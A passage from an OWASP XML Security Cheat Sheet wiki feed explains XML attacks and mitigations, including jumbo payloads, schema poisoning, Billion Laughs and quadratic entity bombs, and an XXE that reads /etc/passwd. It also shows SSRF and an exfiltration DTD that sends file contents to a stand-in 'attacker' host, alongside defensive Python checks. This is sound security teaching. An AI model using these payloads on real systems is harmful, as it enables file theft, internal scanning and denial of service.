* Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;soapenv:Envelope xmlns:soapenv=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot; xmlns:ext=&amp;quot;http://com/ibm/was/wssample/sei/echo/b2b/external&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;soapenv:Header '''largename1'''=&amp;quot;'''largevalue'''&amp;quot; '''largename2'''=&amp;quot;'''largevalue2'''&amp;quot; '''largename3'''=&amp;quot;'''largevalue3'''&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY '''file''' SYSTEM &amp;quot;'''http://attacker/huge.xml'''&amp;quot; &amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;file;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available in the same host, whether or not the schemas are embedded in the same XML document.&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the note element could be removed or altered, allowing any type of data to be sent to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read files stored on the server. This type of schema only serves as a suggestion for sending a document; to be used safely, there must be a way to check the integrity of the embedded schema.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''note.dtd'''&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 -rw-rw-'''rw-'''  1 user  staff  743 Jan 15 12:32 '''note.dtd'''&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML document or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
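&lt;br /&gt;
A deployment check can flag schema files that are writable by everyone. The following Python sketch assumes a POSIX-style filesystem; the function name is hypothetical:&lt;br /&gt;

```python
import os
import stat


def is_world_writable(path):
    """Return True when users outside the owner and group may write to path."""
    mode = os.stat(path).st_mode
    # stat.filemode() renders the mode like "ls -l", e.g. "-rw-rw-rw-";
    # index 8 is the write flag for "other" users.
    return stat.filemode(mode)[8] == "w"
```

For the listing above, the rendered mode is &amp;lt;tt&amp;gt;-rw-rw-rw-&amp;lt;/tt&amp;gt;, so the check would report the file as world-writable.&lt;br /&gt;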
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text, so an attacker could sniff the connection and tamper with the schema before it reaches the end user:&lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''http'''://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted using the unencrypted HTTP protocol. One tool available to facilitate this type of attack is mitmproxy.&lt;br /&gt;
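&lt;br /&gt;
A simple pre-flight check can reject system identifiers that would be fetched over an unencrypted channel. This is a minimal Python sketch with a hypothetical function name; it only inspects the URL scheme and says nothing about whether the remote host itself can be trusted:&lt;br /&gt;

```python
from urllib.parse import urlsplit


def uses_encrypted_transport(system_identifier):
    """Return True only when the schema location uses the https scheme."""
    return urlsplit(system_identifier).scheme == "https"
```

Relative identifiers such as &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; have no scheme and are rejected by this sketch; an application that allows local schemas would need a separate rule for them.&lt;br /&gt;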
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses.&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like https://example.com/note.dtd. In a normal scenario, example.com resolves to the IP address 1.1.1.1:&lt;br /&gt;
 $ host example.com&lt;br /&gt;
 example.com has address 1.1.1.1&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker (2.2.2.2):&lt;br /&gt;
 $ host example.com&lt;br /&gt;
 example.com has address '''2.2.2.2'''&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may actually be retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; references another entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is in turn defined in terms of &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, the schema describes a circular reference between entities:&lt;br /&gt;
 &amp;lt;!DOCTYPE A [&lt;br /&gt;
  &amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;A&amp;gt;'''&amp;amp;A;'''&amp;lt;/A&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n^2)). The following attack results in 100,000*100,000 (10^10) characters in memory.&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(100,000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(100,000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
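&lt;br /&gt;
The amplification can be estimated with simple arithmetic. The Python sketch below uses hypothetical function names and ignores the few bytes of surrounding markup; it assumes each reference to the entity is three characters long (ampersand, name, semicolon), as in the example:&lt;br /&gt;

```python
def expanded_size(entity_length, reference_count):
    """Characters held in memory once every reference has been expanded."""
    return entity_length * reference_count


def payload_size(entity_length, reference_count, reference_length=3):
    """Approximate characters sent: one definition plus all the references."""
    return entity_length + reference_length * reference_count


sent = payload_size(100_000, 100_000)
expanded = expanded_size(100_000, 100_000)
print(sent, expanded, expanded // sent)
```

Under these assumptions, a document of roughly 400,000 characters expands to 10^10 characters, an amplification factor of about 25,000.&lt;br /&gt;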
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the nested entities included within the following code, it will cause the application to start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt; &lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;LOL9;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; expands to 10 references to &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt;; each of those expands to 10 references to &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt;, and so on. In the end, the parser has to expand 10^9 (1,000,000,000) copies of &amp;lt;tt&amp;gt;LOL&amp;lt;/tt&amp;gt;, or 3*10^9 (3,000,000,000) characters, which consumes CPU and memory and could make the parser crash.&lt;br /&gt;
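&lt;br /&gt;
The growth can be verified with a short calculation. In this Python sketch the function name is hypothetical; the defaults (a three-character base entity, ten references per level, nine levels) are taken from the example above:&lt;br /&gt;

```python
def billion_laughs_size(base_text="LOL", fan_out=10, levels=9):
    """Return (copies, characters) produced by expanding the last entity."""
    copies = fan_out ** levels
    return copies, copies * len(base_text)


copies, characters = billion_laughs_size()
print(copies, characters)
```

Each additional level multiplies the result by ten, which is why a document of well under a kilobyte can exhaust the memory of a parser that expands entities without limits.&lt;br /&gt;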
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE SOAP-ENV:Envelope [&lt;br /&gt;
  &amp;lt;!ELEMENT SOAP-ENV:Envelope ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP-ENV:Envelope entityReference CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;SOAP:Envelope entityReference=&amp;quot;'''&amp;amp;LOL9;'''&amp;quot; xmlns:SOAP=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;SOAP:Body&amp;gt;&lt;br /&gt;
   &amp;lt;keyword xmlns=&amp;quot;urn:parasoft:ws:store&amp;quot;&amp;gt;foo&amp;lt;/keyword&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP:Body&amp;gt;&lt;br /&gt;
 &amp;lt;/SOAP:Envelope&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY '''xxe''' SYSTEM &amp;quot;'''/etc/passwd'''&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;xxe;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an external entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt; whose replacement text is the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt;, and which is expanded within the &amp;lt;tt&amp;gt;root&amp;lt;/tt&amp;gt; element. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output.&lt;br /&gt;
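&lt;br /&gt;
One possible mitigation is to switch off external entity handling in the parser. The following Python sketch assumes the application uses the standard library &amp;lt;tt&amp;gt;xml.sax&amp;lt;/tt&amp;gt; module; the function name is hypothetical, and other parsers expose different switches for the same purpose:&lt;br /&gt;

```python
import xml.sax
from xml.sax.handler import feature_external_ges, feature_external_pes


def build_hardened_sax_parser():
    """Create a SAX parser that does not load external entities."""
    parser = xml.sax.make_parser()
    # External general entities, such as the xxe entity in the example above.
    parser.setFeature(feature_external_ges, False)
    # External parameter entities, including an external DTD subset.
    parser.setFeature(feature_external_pes, False)
    return parser
```

Recent Python releases already leave external general entities disabled by default in &amp;lt;tt&amp;gt;xml.sax&amp;lt;/tt&amp;gt;; setting the features explicitly documents the intent and protects against running on an older default.&lt;br /&gt;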
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF) happens when the server receives a malicious XML schema that makes it retrieve remote resources, such as a file served via HTTP, HTTPS, or FTP. SSRF has been used to retrieve remote files, to prove an XXE when the file cannot be reflected back, to perform port scanning, and to perform brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY '''% xxe''' SYSTEM &amp;quot;'''http://attacker/evil.dtd'''&amp;quot;&amp;gt;&lt;br /&gt;
  '''%xxe;'''&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allow for the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY % '''file''' SYSTEM &amp;quot;'''file:///etc/passwd'''&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % '''dtd''' SYSTEM &amp;quot;'''http://attacker/evil.dtd'''&amp;quot;&amp;gt;&lt;br /&gt;
  '''%dtd;'''&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;send;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt;, which loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt;, which loads a remote DTD. The remote DTD should contain something like this:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY % '''all''' &amp;quot;&amp;lt;!ENTITY '''send''' SYSTEM ''''http://example.com/?%file;''''''&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
 '''%all;'''&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL.&lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
This is the simplest and most unusual scenario. With complete disclosure, you can clearly see what is going on by receiving the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
  at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
  at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports, depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), while the response when connecting to an open port is very quick (one second, for example), the difference between open and closed ports becomes quite clear.&lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes the differences between closed and open ports are very subtle. The only way to determine the status of a port with confidence is to take multiple measurements of the time required to reach each host, and then analyze the average time for each port. This type of attack is difficult to accomplish in higher-latency networks.&lt;br /&gt;
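&lt;br /&gt;
The averaging step described above can be sketched in Python as follows. The function names are hypothetical, and the measurements are assumed to have been collected elsewhere as response times in seconds, keyed by port number:&lt;br /&gt;

```python
from statistics import mean


def average_times(samples_by_port):
    """Map each port to the mean of its measured response times (seconds)."""
    return {port: mean(samples) for port, samples in samples_by_port.items()}


def slowest_first(samples_by_port):
    """Return ports ordered from slowest to fastest average response."""
    averages = average_times(samples_by_port)
    return sorted(averages, key=averages.get, reverse=True)
```

Whether the slow or the fast group corresponds to open ports depends on the implementation being tested, so the ordering only becomes meaningful once it is compared against a port whose status is already known.&lt;br /&gt;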
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; as part of the URI. For example:&lt;br /&gt;
 foo://username:password@example.com:8080/&lt;br /&gt;
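&lt;br /&gt;
The components of such a URI can be inspected with Python's standard &amp;lt;tt&amp;gt;urllib.parse&amp;lt;/tt&amp;gt; module, which is useful on the defensive side for detecting credentials embedded in system identifiers. The function name in this sketch is hypothetical:&lt;br /&gt;

```python
from urllib.parse import urlsplit


def split_credentials(uri):
    """Return the userinfo and endpoint components embedded in a URI."""
    parts = urlsplit(uri)
    return {
        "scheme": parts.scheme,
        "username": parts.username,
        "password": parts.password,
        "host": parts.hostname,
        "port": parts.port,
    }


print(split_credentials("foo://username:password@example.com:8080/"))
```

A filter built on this idea could reject any schema location whose &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; component is present.&lt;br /&gt;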
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;br /&gt;
&lt;br /&gt;
= Other Cheatsheets =&lt;br /&gt;
&lt;br /&gt;
{{Cheatsheet_Navigation_Body}}&lt;br /&gt;
[[Category:Cheatsheets]]&lt;br /&gt;
[[Category:Popular]]&lt;br /&gt;
[[Category:OWASP_Breakers]]&lt;br /&gt;
{{TOC hidden}}&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224441</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224441"/>
				<updated>2016-12-21T20:29:44Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
